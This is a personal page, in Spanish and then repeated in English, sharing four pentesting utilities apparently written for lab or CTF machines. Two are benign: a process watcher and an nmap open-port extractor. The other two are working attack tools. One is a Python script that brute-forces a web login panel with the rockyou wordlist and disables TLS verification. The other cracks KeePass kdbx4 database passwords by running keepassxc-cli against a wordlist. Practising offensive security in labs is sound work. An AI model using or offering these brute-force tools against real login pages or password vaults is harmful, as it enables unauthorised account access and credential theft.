03-03-2023
Varias utilidades que he ido programando para distintos escenarios.
#!/bin/env bash
#========================================================#
# Author: Alejandro García Peláez
# Name: watchproc
# Description: Pequeño script en bash para detectar la
# ejecución de procesos "temporales" (automatizados).
#========================================================#
# help panel
help(){
echo -e "[!] Usage: "$0"[FILTER OPTIONS]\n\nFilters:\n"
echo -e "-u, --user\t Filter processes according to a specific user\n"
echo -e "-cmd, --command\t Filter the processes by specifying a part of the command\n"
}
# Ctrl+c or SIGINT trap
trap_handler(){
rm *_proc
echo -e "\n[>](watchproc) Exiting..."
exit 0
}
# Checks if the value is empty
empty_value(){
if [[ -z $1 ]]
then
help
exit 1
fi
}
# Assign the value for filtering
assign_value(){
if [[ -z $FILTERS ]]
then
FILTERS=$1
else
FILTERS=$FILTERS".*"$1
fi
}
# Obtain all processes for comparison
save_proc(){
ps -eo pid,user,cmd --sort -pid | grep -E $FILTERS | grep -Ev "\[" | grep -Ev "$EXPRESSION" > $1
}
trap trap_handler SIGINT
EXPRESSION="grep|ps -eo pid,user,cmd"
FILTERS=""
ARGS=("$@")
for ((i=0; i<$# ; i=i+2))
do
ARG=${ARGS[i]}
VALUE=${ARGS[i+1]}
# The options are just to make it easier to understand what is being done,
# specifically is made for my machine guides.
case $ARG in
-u | --user)
empty_value $VALUE
assign_value $VALUE
;;
-cmd | --command)
empty_value $VALUE
assign_value $VALUE
;;
*)
echo "[x] Unknown arg: "$ARG
help
exit 1
esac
done
echo -e "[0](watchproc) Detecting process execution...\n"
save_proc current_proc
# Watch the processes
while [[ 1 -eq 1 ]]
do
save_proc actual_proc
# Compare
RESULT=$(diff current_proc actual_proc)
if [[ ! -z $RESULT ]]
then
echo $RESULT
save_proc current_proc
fi
done
#!/bin/bash
##
## Author: Alejandro García Peláez
##
## Simple escript en bash para extraer mediante regex los puertos abiertos obtenidos por
## nmap con el formato -oG y copiarlos al "portapapeles" (más conocida como "clipboard").
##
## Por ejemplo (usando TCP port scan por defecto, -sU para UDP):
##
## nmap -p- --open -T5 -n <ip> -oG openTCPports
## ./grePorts
## [!] Open ports: <port1>,<port2>...<portN>
##
if [ -f openTCPports ]; then
ports=$(cat openTCPports | grep -oP Ports:.* \
| grep -oP [0-9].*/ | grep -oP [0-9,] | \
tr -d "\n")
echo "[!] Open ports: $ports"
echo -n $ports | xclip -sel clip
else
echo "[x] The file 'openTCPports' dont exist"
exit 1
fi
#!/bin/env python
# Author: 4rtic f0x
# [x] Usage => python3 login_bruteforce.py <username>
#
# Simple ataque de fuerza bruta via HTTP para un usuario conocido.
import sys, os, requests, pdb, signal, re
from pwn import *
### GLOBALS ###
URL="https://example.com/login.php"
WORDLIST="rockyou.txt"
def signal_handler(sig, frame):
print('\n[!] Signal end...')
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
user = sys.argv[1]
cookies = {'cookies': 'cookies'}
sentinel = 0
progress_bar = log.progress("")
with open(WORDLIST,"rb") as passfile:
for password in passfile:
sentinel += 1
try:
password = password.decode().strip()
progress_bar.status('Bruteforce progress for %s [%s]: %s' % (user,sentinel,password))
auth_data = {
'username': user,
'password': password
}
resp = requests.post(URL,verify=False, data=auth_data, cookies=cookies)
# Verify to False for ssl self-signed certificate
if not re.search("incorrect",resp.text):
print("Username: %s : Password: %s" % (user,password))
exit(0)
except Exception as e:
print("[x] Error on password: %s" % password)
#!/bin/bash
#================================================#
## Author: 4rtic f0x
## Name: kdbx4bf
## Description : Dado que keepass2john no soporta la version 4 de los archivos kdbx
## este script actúa por fuerza bruta usando un diccionario para romper la contraseña y acceder a las
## credenciales.
#================================================#
ARGS=$#
if [[ ARGS -ne 2 ]]; then
echo "[x] Usage: kdbx4bf <kdbx file> <wordlist>"
fi
keepassxc-cli -h &> /dev/null
KEEPASS_INSTALLED=$?
if [[ KEEPASS_INSTALLED -ne 0 ]]; then
echo "[x] There are problems with keepassxc-cli"
fi
SENTINEL=0
WORDS=$(cat $2 | wc -l)
for password in $(cat $2)
do
clear
echo "[!] Working ... "$SENTINEL"/"$WORDS
RESULT=$(echo $password |
keepassxc-cli open $1 2>&1 |
grep -E "Error|Invalid")
if [[ -z $(echo $RESULT) ]]; then
echo "[!] Valid credential for "$1": "$password
exit 0
fi
SENTINEL=$((SENTINEL + 1))
done
echo "[!] Finish => No valid credentials found"
exit 0
Several utilities that I have been programming for different scenarios.
#!/bin/env bash
#========================================================#
# Author: Alejandro García Peláez
# Name: watchproc
# Description: Small script written in bash to detect the
# execution of temporary processes.
#========================================================#
# help panel
help(){
echo -e "[!] Usage: "$0"[FILTER OPTIONS]\n\nFilters:\n"
echo -e "-u, --user\t Filter processes according to a specific user\n"
echo -e "-cmd, --command\t Filter the processes by specifying a part of the command\n"
}
# Ctrl+c or SIGINT trap
trap_handler(){
rm *_proc
echo -e "\n[>](watchproc) Exiting..."
exit 0
}
# Checks if the value is empty
empty_value(){
if [[ -z $1 ]]
then
help
exit 1
fi
}
# Assign the value for filtering
assign_value(){
if [[ -z $FILTERS ]]
then
FILTERS=$1
else
FILTERS=$FILTERS".*"$1
fi
}
# Obtain all processes for comparison
save_proc(){
ps -eo pid,user,cmd --sort -pid | grep -E $FILTERS | grep -Ev "\[" | grep -Ev "$EXPRESSION" > $1
}
trap trap_handler SIGINT
EXPRESSION="grep|ps -eo pid,user,cmd"
FILTERS=""
ARGS=("$@")
for ((i=0; i<$# ; i=i+2))
do
ARG=${ARGS[i]}
VALUE=${ARGS[i+1]}
# The options are just to make it easier to understand what is being done,
# specifically is made for my machine guides.
case $ARG in
-u | --user)
empty_value $VALUE
assign_value $VALUE
;;
-cmd | --command)
empty_value $VALUE
assign_value $VALUE
;;
*)
echo "[x] Unknown arg: "$ARG
help
exit 1
esac
done
echo -e "[0](watchproc) Detecting process execution...\n"
save_proc current_proc
# Watch the processes
while [[ 1 -eq 1 ]]
do
save_proc actual_proc
# Compare
RESULT=$(diff current_proc actual_proc)
if [[ ! -z $RESULT ]]
then
echo $RESULT
save_proc current_proc
fi
done
#!/bin/bash
##
## Author: Alejandro García Peláez
##
## Simple bash script in order to extract the open ports from nmap -oG format
##( and copy them in clipboard )
##
## For example (using TCP port scan by default, -sU for UDP):
##
## nmap -p- --open -T5 -n <ip> -oG openTCPports
## ./grePorts
## [!] Open ports: <port1>,<port2>...<portN>
##
if [ -f openTCPports ]; then
ports=$(cat openTCPports | grep -oP Ports:.* \
| grep -oP [0-9].*/ | grep -oP [0-9,] | \
tr -d "\n")
echo "[!] Open ports: $ports"
echo -n $ports | xclip -sel clip
else
echo "[x] The file 'openTCPports' dont exist"
exit 1
fi
#!/bin/env python
# Author: 4rtic f0x
# [x] Usage => python3 login_bruteforce.py <username>
#
# Simple python script to brute-force attack a login panel from known user
import sys, os, requests, pdb, signal, re
from pwn import *
### GLOBALS ###
URL="https://example.com/login.php"
WORDLIST="rockyou.txt"
def signal_handler(sig, frame):
print('\n[!] Signal end...')
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
user = sys.argv[1]
cookies = {'cookies': 'cookies'}
sentinel = 0
progress_bar = log.progress("")
with open(WORDLIST,"rb") as passfile:
for password in passfile:
sentinel += 1
try:
password = password.decode().strip()
progress_bar.status('Bruteforce progress for %s [%s]: %s' % (user,sentinel,password))
auth_data = {
'username': user,
'password': password
}
resp = requests.post(URL,verify=False, data=auth_data, cookies=cookies)
# Verify to False for ssl self-signed certificate
if not re.search("incorrect",resp.text):
print("Username: %s : Password: %s" % (user,password))
exit(0)
except Exception as e:
print("[x] Error on password: %s" % password)
#!/bin/bash
#================================================#
## Author: 4rtic f0x
## Name: kdbx4bf
## Description : Since keepass2john does not support version 4 of the kdbx
## files this script acts by brute force using a dictionary to break the password and gain access to the
## credentials.
#================================================#
ARGS=$#
if [[ ARGS -ne 2 ]]; then
echo "[x] Usage: kdbx4bf <kdbx file> <wordlist>"
fi
keepassxc-cli -h &> /dev/null
KEEPASS_INSTALLED=$?
if [[ KEEPASS_INSTALLED -ne 0 ]]; then
echo "[x] There are problems with keepassxc-cli"
fi
SENTINEL=0
WORDS=$(cat $2 | wc -l)
for password in $(cat $2)
do
clear
echo "[!] Working ... "$SENTINEL"/"$WORDS
RESULT=$(echo $password |
keepassxc-cli open $1 2>&1 |
grep -E "Error|Invalid")
if [[ -z $(echo $RESULT) ]]; then
echo "[!] Valid credential for "$1": "$password
exit 0
fi
SENTINEL=$((SENTINEL + 1))
done
echo "[!] Finish => No valid credentials found"
exit 0